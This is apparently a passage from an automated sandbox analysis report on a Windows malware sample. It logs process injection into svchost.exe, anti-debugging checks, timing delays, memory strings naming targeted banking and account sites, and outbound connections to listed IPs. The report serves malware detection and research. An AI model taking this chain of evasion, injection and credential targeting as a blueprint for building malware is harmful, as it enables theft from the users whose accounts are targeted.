              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599341Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598686Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598573Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598340Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598124Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597568Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597323Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597203Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597093Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596984Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596765Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596546Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596437Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596325Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596218Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595890Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595781Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595671Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595562Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595343Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595234Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595125Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595015Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594906Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594796Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594687Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594578Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 600000Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599875Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599766Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599656Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599547Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599438Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599328Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599219Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 599109Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598998Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598724Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598263Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 598047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597828Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597719Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597484Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597375Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597266Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597156Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 597047Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596938Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596813Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596703Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596469Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596141Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 596031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595812Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595702Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595594Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595469Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595359Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595250Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595141Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 595031Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594922Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594813Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594688Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594563Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594453Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeThread delayed: delay time: 594344Jump to behavior
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4473666032.00000000056F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcae9abfa21153<
              Source: svchost.exe, 00000003.00000002.4471617531.0000000003054000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll/trackingProfile>
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: svchost.exe, 00000003.00000002.4473198929.00000000052F0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $]qEmultipart/form-data; boundary=------------------------8dcad0e9d9f0038<
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: svchost.exe, 00000006.00000002.4471702197.000000000346D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll>
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
              Source: svchost.exe, 00000006.00000002.4475799981.00000000068F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
              Source: svchost.exe, 00000006.00000002.4475799981.0000000006952000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeAPI call chain: ExitProcess graph end node
              Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_080A9578 LdrInitializeThunk,3_2_080A9578
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C6EAA2 BlockInput,0_2_00C6EAA2
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C22622
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,3_2_004019F0
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00BF42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00BF42DE
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C14CE8 mov eax, dword ptr fs:[00000030h]0_2_00C14CE8
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00B634E0 mov eax, dword ptr fs:[00000030h]0_2_00B634E0
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00B63540 mov eax, dword ptr fs:[00000030h]0_2_00B63540
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00B61EB0 mov eax, dword ptr fs:[00000030h]0_2_00B61EB0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E84CE8 mov eax, dword ptr fs:[00000030h]2_2_00E84CE8
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_035C3540 mov eax, dword ptr fs:[00000030h]2_2_035C3540
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_035C34E0 mov eax, dword ptr fs:[00000030h]2_2_035C34E0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_035C1EB0 mov eax, dword ptr fs:[00000030h]2_2_035C1EB0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 5_2_013D1EB0 mov eax, dword ptr fs:[00000030h]5_2_013D1EB0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 5_2_013D34E0 mov eax, dword ptr fs:[00000030h]5_2_013D34E0
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 5_2_013D3540 mov eax, dword ptr fs:[00000030h]5_2_013D3540
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C50B62
              Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C22622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C22622
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C1083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00C1083F
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C109D5 SetUnhandledExceptionFilter,0_2_00C109D5
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C10C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00C10C21
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E92622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E92622
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E8083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00E8083F
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E809D5 SetUnhandledExceptionFilter,2_2_00E809D5
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeCode function: 2_2_00E80C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00E80C21
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_004123F1 SetUnhandledExceptionFilter,3_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040CE09
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_0040E61C
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00416F6A
              Source: C:\Windows\SysWOW64\svchost.exeCode function: 6_2_004123F1 SetUnhandledExceptionFilter,6_2_004123F1
              Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: page read and write | page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 118.69.190.131 587Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 158.101.44.242 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 149.154.167.220 443Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 188.114.97.3 443Jump to behavior
              Maps a DLL or memory area into another process
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeSection loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and writeJump to behavior
              Writes to foreign memory regions
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2CD7008Jump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeMemory written: C:\Windows\SysWOW64\svchost.exe base: 2F93008Jump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C51201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00C51201
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C32BA5 SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00C32BA5
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C5B226 SendInput,keybd_event,0_2_00C5B226
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C722DA GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00C722DA
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\DSD876543456780000.exe"Jump to behavior
              Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\nonsubmerged\chordates.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
              Source: C:\Users\user\AppData\Local\nonsubmerged\chordates.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\AppData\Local\nonsubmerged\chordates.exe" Jump to behavior
              Source: C:\Users\user\Desktop\DSD876543456780000.exeCode function: 0_2_00C50B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00C50B62
